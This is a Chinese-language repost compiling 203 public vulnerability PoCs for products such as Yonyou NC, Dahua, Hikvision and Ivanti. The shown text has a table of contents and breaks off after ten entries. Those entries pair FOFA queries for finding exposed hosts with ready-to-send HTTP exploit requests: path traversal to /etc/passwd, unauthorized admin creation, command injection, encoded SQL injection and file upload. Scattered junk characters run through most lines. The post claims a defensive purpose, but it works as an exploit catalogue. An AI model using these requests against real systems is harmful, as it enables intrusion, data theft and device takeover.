互联网公开漏洞整理202309-202406# M' Q, F/ r7 W' i0 A. [
道一安全 2024-06-05 07:41 北京0 a( m/ p& A' L+ z. M
以下文章来源于网络安全新视界 ,作者网络安全新视界! d" O3 F' O8 e5 Q
& n! \+ Q8 l* q% p9 g( `( A
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
2 c$ I5 G: B# z9 ~% K0 ]. q
( B0 ^3 k: E) P/ ]- e7 C$ }9 L漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。! n6 H2 a9 B+ C6 m5 @
$ v4 u9 N+ h8 ^. s- {9 }/ u! u安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
3 x, u- h% q7 `. s( F& m6 p- ^; `! z8 u5 _! F! Y4 C7 S, n/ h
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。" p* |0 \7 n7 @+ e6 r' L1 ^
' x. O6 `! f+ v9 `% M, P( A' n+ b& Y9 _合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。% G8 b; c6 a" L' M( Y$ y
2 C6 i: O+ \# r7 T& B2 R
4 l% f6 Z4 e/ B; G. F- {% Q声明: w8 o, g6 R, c& V5 J# h
0 Q9 L) o: q1 Q/ ?5 Q1 Z7 b4 ]为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。! r/ j6 z# [$ E; c
5 a9 v1 l7 F! a# d8 b# X8 e9 j有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。* a8 n" v8 H- \$ x# N* s0 W1 Z
- Q7 A+ V. q8 J' f
0 u5 T, r, c3 f! F: b" U& Y
4 f9 Q) A& L* l. d0 S, Z目录9 r# ~! y, J* V. o
3 l+ B1 G/ L' m" P0 o; M
016 T! c. ?/ k2 t3 }: D
2 ^( p1 I7 }/ D# p1. StarRocks MPP数据库未授权访问) g6 k7 i4 G+ q2 J
2. Casdoor系统static任意文件读取
* v9 d( ]4 a+ u& J( x3. EasyCVR智能边缘网关 userlist 信息泄漏
) }! Q( ?- y9 ?1 w4. EasyCVR视频管理平台存在任意用户添加
' `2 o) q2 K. G- s3 ]5. NUUO NVR 视频存储管理设备远程命令执行# R( t% n, ?. S e
6. 深信服 NGAF 任意文件读取
. u: o/ R# z! x0 U7. 鸿运主动安全监控云平台任意文件下载
. O, Q* p" |1 F, C8. 斐讯 Phicomm 路由器RCE
* ~: g, u, n$ k) |9. 稻壳CMS keyword 未授权SQL注入- O6 z! a! }8 x, _, z3 c
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
. S7 Q( z c* i$ @) l" L+ n11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# B$ P* @% g& m5 p$ i8 d" V12. Jorani < 1.0.2 远程命令执行; d% E1 q2 H% n* I- T2 ^; D$ E
13. 红帆iOffice ioFileDown任意文件读取$ [3 Z3 U1 P+ e8 O# a) [
14. 华夏ERP(jshERP)敏感信息泄露
4 X' w e" Y9 T; n- s; [2 i15. 华夏ERP getAllList信息泄露! |" w' M: t2 q3 j
16. 红帆HFOffice医微云SQL注入" V o, n% Y+ K) P* L/ G8 k
17. 大华 DSS itcBulletin SQL 注入
1 a8 ~- ?( K# ^9 @# g$ Q18. 大华 DSS 数字监控系统 user_edit.action 信息泄露2 \# Z3 y) ~+ m2 r% p: N
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入0 P$ \. i, c. M- c4 |0 U
20. 大华ICC智能物联综合管理平台任意文件读取
$ m/ Z: E. ^' m1 E6 X n- g21. 大华ICC智能物联综合管理平台random远程代码执行& a2 W# d- d, o4 a1 {7 i( \
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
0 Q) [9 N5 ?6 K3 V# U! R, U. B23. 大华ICC智能物联综合管理平台 fastjson远程代码执行 `+ ]+ z: L1 b
24. 用友NC 6.5 accept.jsp任意文件上传* j/ B2 ^+ F2 n9 `
25. 用友NC registerServlet JNDI 远程代码执行
1 u+ T) m# }# V26. 用友NC linkVoucher SQL注入3 f, V% P# G! L1 k. S s% J& ^
27. 用友 NC showcontent SQL注入
6 I0 S$ O8 s! q5 r8 z# f2 p' }28. 用友NC grouptemplet 任意文件上传" Y% k+ J) u: T# l: \/ F& j
29. 用友NC down/bill SQL注入/ |/ K3 X' c, ?7 }3 c) r' C
30. 用友NC importPml SQL注入0 c. ?) @$ f2 t8 V) i# N1 F
31. 用友NC runStateServlet SQL注入. X1 y& ]0 j; M9 A" W7 G- t, o: X. T8 Z
32. 用友NC complainbilldetail SQL注入7 F+ s+ ] M- h5 m2 }! ] k
33. 用友NC downTax/download SQL注入
; ?/ @4 w& P5 E# K) g7 S34. 用友NC warningDetailInfo接口SQL注入5 i- Q% G+ `% Z0 I* }) g( M" u
35. 用友NC-Cloud importhttpscer任意文件上传
% u S7 \' T- c" w% J: _4 I36. 用友NC-Cloud soapFormat XXE
/ @5 Y, T6 _& A/ w u0 w37. 用友NC-Cloud IUpdateService XXE2 r$ j7 \1 T( \
38. 用友U8 Cloud smartweb2.RPC.d XXE
0 M' E! D1 V4 i2 A0 @( j' h39. 用友U8 Cloud RegisterServlet SQL注入
1 l5 L7 z2 s5 c. _6 {# R, m40. 用友U8-Cloud XChangeServlet XXE8 `/ S" \5 |3 z) n) q: q
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入 b G/ e9 f2 c/ t0 e- x4 d
42. 用友GRP-U8 SmartUpload01 文件上传/ F% d& |* M; B, v/ G- A' q- v& o
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
5 |+ k% N5 B. o4 Y) G" k- M44. 用友GRP-U8 bx_dj_check.jsp SQL注入4 L- K) g2 w% y$ i/ f0 |
45. 用友GRP-U8 ufgovbank XXE' b# W: b8 p4 [, k9 s
46. 用友GRP-U8 sqcxIndex.jsp SQL注入% j1 N/ {. L) h/ l
47. 用友GRP A++Cloud 政府财务云 任意文件读取4 X! F r% e) T: _8 d& N. Y
48. 用友U8 CRM swfupload 任意文件上传" e- ^; N, F! Z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传7 Q3 g) _0 [& q, h) O$ }) Y
50. QDocs Smart School 6.4.1 filterRecords SQL注入
# c1 ]' E$ B2 v51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
" @! T1 ?) J+ t52. 泛微E-Office json_common.php sql注入' _' b8 w5 w: e$ Y) W) V, O( y
53. 迪普 DPTech VPN Service 任意文件上传
+ E9 a4 c5 ^0 I0 R( D: b54. 畅捷通T+ getstorewarehousebystore 远程代码执行
* X( R" Q$ }: q+ J55. 畅捷通T+ getdecallusers信息泄露
0 O) k6 L7 c( S% ~0 y$ G" u56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE) F! o( |. u8 _: D9 F# n& r
57. 畅捷通T+ keyEdit.aspx SQL注入( A% r5 e0 E5 W6 E
58. 畅捷通T+ KeyInfoList.aspx sql注入
" V3 O6 Q$ v3 C, I+ G59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行9 M- } q4 {' z5 \* Q4 |
60. 百卓Smart管理平台 importexport.php SQL注入. ]: a6 ? u0 _6 C/ h' a. h
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 Q: u6 `# r; V2 X( C4 R62. IP-guard WebServer 远程命令执行: G2 Z5 v4 R- K3 h* E$ Q2 |8 `" e
63. IP-guard WebServer任意文件读取
! w6 P% Z a# g64. 捷诚管理信息系统CWSFinanceCommon SQL注入0 X( o# L6 T. N1 Q# T6 S; c3 h4 L& d
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
3 l* N! z9 w" n$ l: u2 k, h! q66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. X% B( ?" U: `9 T67. 万户ezOFFICE wpsservlet任意文件上传
8 B4 L6 v8 T$ ?1 A68. 万户ezOFFICE wf_printnum.jsp SQL注入
, N. P! I! ~; k2 J69. 万户 ezOFFICE contract_gd.jsp SQL注入
) n# f/ p8 A7 U/ P0 t1 J70. 万户ezEIP success 命令执行' V' B- O" M( o+ Q" j) @
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
0 ^: E U7 x9 I9 X5 w6 F+ G72. 致远OA getAjaxDataServlet XXE4 @; s8 j7 z& Y6 Q
73. GeoServer wms远程代码执行
6 e' }( f/ r4 y74. 致远M3-server 6_1sp1 反序列化RCE
& r' { F' \1 U. d: U! D75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
6 J4 k/ q9 o% j76. 新开普掌上校园服务管理平台service.action远程命令执行
4 h7 U/ h* {: N1 D" H77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ z& Q& x* d- ^
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传" `% h7 L9 x/ [( y; f
79. BYTEVALUE 百为流控路由器远程命令执行2 ~& Z/ `: s+ C% M) [5 n7 u
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传- P+ i9 M$ N# b2 D% E% @
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露* J; u. |1 c1 J
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' V: B& z' r3 i; P
83. JeecgBoot testConnection 远程命令执行
2 [/ L; f5 H i% K84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
) V5 t; U; ?0 _8 x$ v7 Q2 ]85. SysAid On-premise< 23.3.36远程代码执行
; p/ r- u8 v# y7 B# S3 |; h86. 日本tosei自助洗衣机RCE x) E$ ~4 @5 Y8 a3 K, k, m0 Z( d
87. 安恒明御安全网关aaa_local_web_preview文件上传' N1 u3 @9 @, L7 `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
# W1 ?6 y- k! V4 d9 O89. 致远互联FE协作办公平台editflow_manager存在sql注入- u6 Q" f0 G! q
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# p* S0 I* U5 e3 _
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
) d, N& M, d0 ]! P. G# W92. 海康威视运行管理中心session命令执行; Q$ k% K7 Q4 O6 [ g6 R) u
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
# K& C: g7 h& a. }94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传1 w$ b. r- {; [' B
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
& M5 h* e8 y8 }2 k4 x2 J% m96. Apache OFBiz 18.12.11 groovy 远程代码执行* W9 x8 [, }/ p2 G
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行$ h3 G; S) ?+ R$ z
98. SpiderFlow爬虫平台远程命令执行 r2 w7 R4 ~. I, I
99. Ncast盈可视高清智能录播系统busiFacade RCE4 m% {; x; K+ h h- P+ W3 K
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传" y. Q7 N$ p9 f+ x) B' L
101. ivanti policy secure-22.6命令注入
! P9 H$ k% d" E( }102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
' j8 l2 a& `- C+ Z103. Ivanti Pulse Connect Secure VPN XXE
. N5 m# o. x# R w4 O104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
2 S8 G; s/ Q. k. v1 G105. SpringBlade v3.2.0 export-user SQL 注入+ A# U, |. ^# J. O5 j$ a8 l- v
106. SpringBlade dict-biz/list SQL 注入
6 M& c. q" f- k& H( z' E2 n5 s) ^107. SpringBlade tenant/list SQL 注入
8 y+ A, i) c4 A" O6 O2 \108. D-Tale 3.9.0 SSRF" H5 f9 j9 b- I$ W& x( s
109. Jenkins CLI 任意文件读取5 @, T7 J O# \, g6 Y# C
110. Goanywhere MFT 未授权创建管理员" Y. r0 W' u. p; \8 n* Z
111. WordPress Plugin HTML5 Video Player SQL注入
& w r5 X/ T4 m# X0 o112. WordPress Plugin NotificationX SQL 注入
: T2 K* q2 x2 r' @- p113. WordPress Automatic 插件任意文件下载和SSRF+ d& F+ v5 K6 P8 U
114. WordPress MasterStudy LMS插件 SQL注入
2 ^( s0 O' ]' F+ S* R' \115. WordPress Bricks Builder <= 1.9.6 RCE
4 C0 m M6 p# W$ \+ e* T6 x116. wordpress js-support-ticket文件上传
1 n7 G$ \6 R& P! n) v, \- c117. WordPress LayerSlider插件SQL注入
; i9 S) L: _0 b$ }# I118. 北京百绰智能S210管理平台uploadfile.php任意文件上传* i8 e8 R" k/ [+ B: U V* X) n2 w
119. 北京百绰智能S20后台sysmanageajax.php sql注入! D& z6 }2 R" H. x+ u2 H
120. 北京百绰智能S40管理平台导入web.php任意文件上传
& M1 W% n+ z4 P8 F; L0 a121. 北京百绰智能S42管理平台userattestation.php任意文件上传
; n( Q( P. Y$ P$ ^9 A/ ~122. 北京百绰智能s200管理平台/importexport.php sql注入
' ]0 @, H4 `5 e7 j123. Atlassian Confluence 模板注入代码执行
( z8 D+ J. b/ R2 G8 U& f2 H% v( l124. 湖南建研工程质量检测系统任意文件上传5 U: i" G# d; E' o' W. F9 s. v
125. ConnectWise ScreenConnect身份验证绕过% D: x; P- X6 N- x& r
126. Aiohttp 路径遍历8 L* V$ {3 s4 a2 z: [
127. 广联达Linkworks DataExchange.ashx XXE
a @) J# W0 a$ r6 j5 Y128. Adobe ColdFusion 反序列化
9 t& ^3 O; `% Z+ ~8 D" i& G! e129. Adobe ColdFusion 任意文件读取/ L! r' J& {; J# x2 v2 p
130. Laykefu客服系统任意文件上传
* N3 M! Z( {, \7 G131. Mini-Tmall <=20231017 SQL注入4 V: K0 z. ?/ A& M+ Q1 K4 h2 i
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过9 ?# i/ A2 A/ w. M" [% Q
133. H5 云商城 file.php 文件上传* j, ]6 Z8 N5 D. S) G
134. 网康NS-ASG应用安全网关index.php sql注入
. h( K. \& p' g2 E135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
/ c% H e* \/ @. G# a, \136. NextChat cors SSRF
" w ]; d; M, I# e: P! F) u' T137. 福建科立迅通信指挥调度平台down_file.php sql注入" B2 C/ d- C/ J( _( E3 p' J) S1 T
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
+ l! D+ u+ f) R139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 w# L( W9 s2 P
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
' Y2 P# W( V2 y8 o141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
1 d6 x+ \4 ?0 {: N142. CMSV6车辆监控平台系统中存在弱密码 Y# @# x+ L3 X5 ?0 w
143. Netis WF2780 v2.1.40144 远程命令执行
4 g2 t' K! T9 ]2 g# U144. D-Link nas_sharing.cgi 命令注入, H& o- [1 Z- Z/ |9 \) `. N
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 a! T& j2 @4 }- H) y; `
146. MajorDoMo thumb.php 未授权远程代码执行
4 X( W9 B/ x. z; g( S( _/ |147. RaidenMAILD邮件服务器v.4.9.4-路径遍历6 m2 |' K7 B% f
148. CrushFTP 认证绕过模板注入0 Y% S: w# T5 P
149. AJ-Report开源数据大屏存在远程命令执行" u2 V8 o6 L% i0 P, `
150. AJ-Report 1.4.0 认证绕过与远程代码执行" u6 s9 u4 S7 G# w+ j5 v5 s$ c
151. AJ-Report 1.4.1 pageList sql注入
* p: t# @$ P' J- M+ C8 h4 S/ ^6 e152. Progress Kemp LoadMaster 远程命令执行7 o3 Q9 ]0 c5 N' T! w& T$ l
153. gradio任意文件读取
, I, M* M9 w& n& J" L; g& J. c154. 天维尔消防救援作战调度平台 SQL注入
" M( @0 p! G. W$ E& P1 ~5 w155. 六零导航页 file.php 任意文件上传) a6 X1 E g* o% e0 x; B' O/ Q: P
156. TBK DVR-4104/DVR-4216 操作系统命令注入
) Y3 f, q# }) a' \157. 美特CRM upload.jsp 任意文件上传* [ B; e5 x. k6 o' x( N4 y
158. Mura-CMS-processAsyncObject存在SQL注入
/ e/ H5 ~4 E! X: |) r2 h159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
+ V7 U& T6 L( k, y160. Sonatype Nexus Repository 3目录遍历与文件读取' A( g5 n: W1 u+ p$ }3 q
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
4 k) U4 u9 [0 B162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
& ^3 H8 h% J" _- m) F163. 号卡极团分销管理系统 ue_serve.php 任意文件上传8 n1 _6 a' s7 p: l2 ^) N) H
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传# F I- g& a `+ |
165. OrangeHRM 3.3.3 SQL 注入
! g9 O7 g4 `5 y# {166. 中成科信票务管理平台SeatMapHandler SQL注入
1 N; t5 W+ g7 K( \+ P( p167. 精益价值管理系统 DownLoad.aspx任意文件读取
+ D2 k r0 M) `6 ]: J1 R7 g168. 宏景EHR OutputCode 任意文件读取+ @3 C' C% i$ |$ w' O; ~ s7 D
169. 宏景EHR downlawbase SQL注入3 N8 P" `; ]7 F2 V; m) O5 u7 Q
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
8 W8 B8 V* r7 v, \$ Y171. 通天星CMSV6车载定位监控平台 SQL注入
7 H. U! m1 ~( q% B3 Y172. DT-高清车牌识别摄像机任意文件读取 J- \& W& @ Y5 W# r3 B0 U* P
173. Check Point 安全网关任意文件读取% j* u" Q$ J; D! q4 M' I
174. 金和OA C6 FileDownLoad.aspx 任意文件读取( o/ \5 x7 a: P* d: M
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
" m) z+ q& X6 S2 a1 M9 o176. 电信网关配置管理系统 rewrite.php 文件上传: z6 Q* L- [. G% J
177. H3C路由器敏感信息泄露
! ~9 D. f- v! c/ h178. H3C校园网自助服务系统-flexfileupload-任意文件上传. L- J$ P v- J2 K6 l8 T
179. 建文工程管理系统存在任意文件读取
" ~3 b; B& H! {/ [$ N180. 帮管客 CRM jiliyu SQL注入
( a0 ~0 h+ B9 M# Q8 W% \4 a181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
( w: A: ~% i! N182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建: i, @1 e3 i$ l+ S; m% ]
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
8 E- ^4 a; s! e* T: m2 z1 K( I184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ R6 X$ M( X9 C) ^4 | R185. 瑞友天翼应用虚拟化系统SQL注入& C- P6 ]7 T( ?3 W) T
186. F-logic DataCube3 SQL注入
3 p, o9 D' a) _ U9 {187. Mura CMS processAsyncObject SQL注入
* O9 @. r; t; B5 l8 i; a188. 叁体-佳会视频会议 attachment 任意文件读取# b c, _" W- X. v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
; a+ u+ R0 r3 D2 F: z; N, t190. 短视频矩阵营销系统 poihuoqu 任意文件读取% S5 s0 B0 h" k
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
3 \$ b1 \% h3 T4 l+ \" C' U192. 富通天下外贸ERP UploadEmailAttr 任意文件上传3 G3 R+ L+ B+ \1 V. s6 |, J9 G
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
6 e) i; I% | t. J5 O194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传! V) J1 P8 H- a; |, P0 w" f
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
. C# X+ {8 g; D9 r196. 河南省风速科技统一认证平台密码重置+ S) \. d" M" z% K i! G% R
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ \ S! C0 u" J1 M( g2 F% f
198. 阿里云盘 WebDAV 命令注入7 a7 j1 w2 Y8 s
199. cockpit系统assetsmanager_upload接口 文件上传; f( g9 ]; C# L) y7 P4 ?0 V7 g0 Q, a
200. SeaCMS海洋影视管理系统dmku SQL注入4 o' b$ U( K( E6 [4 O
201. 方正全媒体新闻采编系统 binary SQL注入
+ W7 ~( u/ D7 X1 c$ ~202. 微擎系统 AccountEdit任意文件上传
( [1 k# }, ?) c3 x) L6 w8 f9 l203. 红海云EHR PtFjk 文件上传
) R9 P; Y2 U5 Z0 S6 ^
+ w( l' L: e9 r1 ?. Y C; ~+ K: v$ XPOC列表
( E% Z/ B) I* h2 l; g3 l$ c+ v2 J& [! Z0 A+ M
02
9 p1 o: N2 d" g4 ?9 M: W* A0 h$ _
+ c( I( E# c6 d8 e2 g$ m7 h1. StarRocks MPP数据库未授权访问
. P) y; j0 p$ m" F- b( WFOFA :title="StarRocks"
" ^6 ^) x: U/ H: p- Y# w% }* qGET /mem_tracker HTTP/1.18 _- @& L. ^6 l2 n' K" N! t
Host: URL
2 y8 d3 B0 h5 A+ c( j, e7 x2 }/ z, S1 K8 H$ x! x& l- Q
: w& n! G [! _$ U2 p% C8 O5 f2. Casdoor系统static任意文件读取
! Q" J5 l; Q! P) ]FOFA :title="Casdoor"7 A3 @3 H" [5 j2 ~- u4 X
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
" u3 M& g* P8 S$ `Host: xx.xx.xx.xx:9999$ g& q: W! t+ }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ Q+ n7 C3 k0 U* p3 b3 A' m
Connection: close9 g' c+ `' O! Z, S% I, [
Accept: */*; |) i+ n: T! W; T* ^. A+ r. T s
Accept-Language: en; I; ^- `. {3 Z t6 d3 {
Accept-Encoding: gzip5 K- N- g: H6 ^& Y
: e; {1 f* j( r0 h
* X$ E4 M) m, ^
3. EasyCVR智能边缘网关 userlist 信息泄漏
, g# {3 W6 A! ~- i- u( s! X- a8 |FOFA :title="EasyCVR". m9 u- E4 T1 @5 p9 ~+ k6 M
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
, R3 v! R; `2 ] _& }Host: xx.xx.xx.xx6 u( {! |; R5 J% t2 c. R
2 `$ z# w) C- O3 c) u9 }& d& V, Y! r; e# ?
4. EasyCVR视频管理平台存在任意用户添加
) g# |0 T3 {: y' V0 b0 GFOFA :title="EasyCVR"
- R, w z* c v
( F" n" e. @- z- dpassword更改为自己的密码md5, }( C5 Q, [9 h# t5 D) \/ s& ~
POST /api/v1/adduser HTTP/1.1! ?! G3 M) f" E o2 D$ I
Host: your-ip' H+ l4 v1 G: c3 c9 v1 h) x" Y
Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ c! X6 h6 T! m4 K& w) W) w
& Z* U+ u2 ?* z) t
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
: V; {' ~) q7 }8 W" \5 Y4 T! r9 V+ C# l; r1 B+ @: k- b
: Y' K, Q* c, s: I2 `' K8 |- c( V2 _; u
5. NUUO NVR 视频存储管理设备远程命令执行3 a. M0 d$ W. ?! }; T
FOFA:title="Network Video Recorder Login"
7 Z0 B- {$ r( d# xGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
- [+ }" k6 h8 @* M7 HHost: xx.xx.xx.xx
- h J+ }' k0 a6 G( W
+ Z! G1 f8 @# _" D' ^, O" p; {+ E- ?
6. 深信服 NGAF 任意文件读取8 v) ~0 z- R2 {! s+ V1 j+ l. F. _
FOFA:title="SANGFOR | NGAF", @" p* k% A4 I. n3 c% i
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.12 s2 d' f& a& o U+ v
Host:/ @5 K1 O4 R, X
3 O7 I9 h8 c5 Y) R3 H. u; o$ H" K
) @" y6 w. x3 D! B) v# g, [2 I6 Z7. 鸿运主动安全监控云平台任意文件下载
. h- z) O' X. N! L' q! ^4 S* i2 EFOFA:body="./open/webApi.html"5 b: S9 P( l% O
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1* f% r: G( t! N& |& g7 L$ X3 D6 ~, O
Host:# m' r( `! R7 P6 K5 p
}% @+ H5 V$ w3 _; r+ m3 ~% [2 p9 @7 M# M
8. 斐讯 Phicomm 路由器RCE9 [9 z- }3 O, I1 e1 A% l' e
FOFA:icon_hash="-1344736688"- i: e' O0 O' T) g
默认账号admin登录后台后,执行操作; b! Z0 Y/ \" b8 m7 G+ u
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1% Y- z- ` y& \
Host: x.x.x.x/ [* V: { W" j2 |, c$ V5 T( j
Cookie: sysauth=第一步登录获取的cookie
3 ?& Q1 \! B, \9 MContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz0 {) C9 o* J6 D# P) l: u; G5 r
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
6 w n" j1 k; G5 l
. c% B7 a; V6 i, x) z" n) F5 X7 A------WebKitFormBoundaryxbgjoytz* u( {) w. ]) h7 z: J4 }, [7 y
Content-Disposition: form-data; name="wifiRebootEnablestatus". _* l: c/ l7 i8 s: G; n
+ z! ]$ }& ^3 i; a6 ?/ |
%s" t& L" x8 u4 P2 P ~0 f! z
------WebKitFormBoundaryxbgjoytz
5 p6 g: s9 Y! A- w7 o' p5 l6 g0 hContent-Disposition: form-data; name="wifiRebootrange"
x: |% m4 K( E& L$ c2 W" p
1 h7 [. O+ b p6 |! T7 Q* b, E- V12:00; id;
! a |. q0 K, V( Y7 W7 e1 \& c) c; v------WebKitFormBoundaryxbgjoytz
2 P% N/ C+ M6 V* D0 Q# G+ lContent-Disposition: form-data; name="wifiRebootendrange"
# s3 n3 s& J5 \# T
* h( B" Z; x. `5 w4 }% i% S) J) @%s:
6 |* n6 D0 D3 y5 I4 m. A------WebKitFormBoundaryxbgjoytz6 D ~# a: Q3 }6 v1 Z4 j
Content-Disposition: form-data; name="cururl2"
& D. \1 O5 [' O$ f" N ~
+ P! A; ~8 w: ]( J
$ N( \2 n2 F2 X" s* @------WebKitFormBoundaryxbgjoytz--: N, i7 E) E6 K
; f! K* d: i1 `% {' W
" F0 H& ]& M7 o9. 稻壳CMS keyword 未授权SQL注入* u }' I: ]) K# u {- t3 t; G
FOFA:app="Doccms"
( B( R% n3 u/ _$ g) OGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
6 ^- g8 G4 u0 w6 q" Q0 D: zHost: x.x.x.x
$ ]* G7 U. E" W8 C
, ~0 _) s- |# u1 x0 K+ {1 V; k- y, S( ]2 O' j+ I; a
payload为下列语句的二次Url编码; m; F6 t& x3 P+ _ D! D
# u( s) ]; X f& [# _1 d! s
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
4 ~2 ]6 U4 {# a( o( T, m- o% c& L9 ^ X6 U+ f9 {. o4 ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
8 M) ^9 \4 H& S. Q$ pFOFA:icon_hash="953405444"$ C8 o3 J" P' j8 l' j+ C$ s- C
7 Y; b/ {. N; l, I( P* i0 h j
文件上传后响应中包含上传文件的路径, S5 v# }9 e+ ?) t
POST /eis/service/api.aspx?action=saveImg HTTP/1.1+ W) Z0 f0 [6 g/ c
Host: x.x.x.x:xx
! \& i: G, S7 \) A7 [/ X% a( RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36# t& @# `1 ^4 [6 c
Content-Length: 197$ K6 n. ~0 l# }# A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 ~6 [5 f9 S u. f, G9 D5 J
Accept-Encoding: gzip, deflate
1 [+ B0 D- |1 P6 g, M6 m3 M: PAccept-Language: zh-CN,zh;q=0.9
/ U/ s+ Y5 c0 ]* iConnection: close
' m7 w: f3 ~) h1 l' p. BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu3 Y6 P; w/ b0 l" F$ |: a
: @3 n5 C& `4 \6 p- U------WebKitFormBoundaryxdgaqmqu
+ u- t$ {( U+ m+ M+ N! J( [% a) U$ rContent-Disposition: form-data; name="file"filename="icfitnya.txt", j+ ?4 S, a! X
Content-Type: text/html6 p8 A. a( F" N$ J1 d% W4 [$ X
# T5 F L. I8 z8 n6 A7 R1 j; F
jmnqjfdsupxgfidopeixbgsxbf9 g4 {/ e: ]7 B! U
------WebKitFormBoundaryxdgaqmqu--
, C# Y3 e3 ^& V- y( F0 \3 F! M$ }- O6 }" @. V4 n
0 k- c2 R: U7 j, J+ y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入) ?3 \( j+ X' b3 ~' n
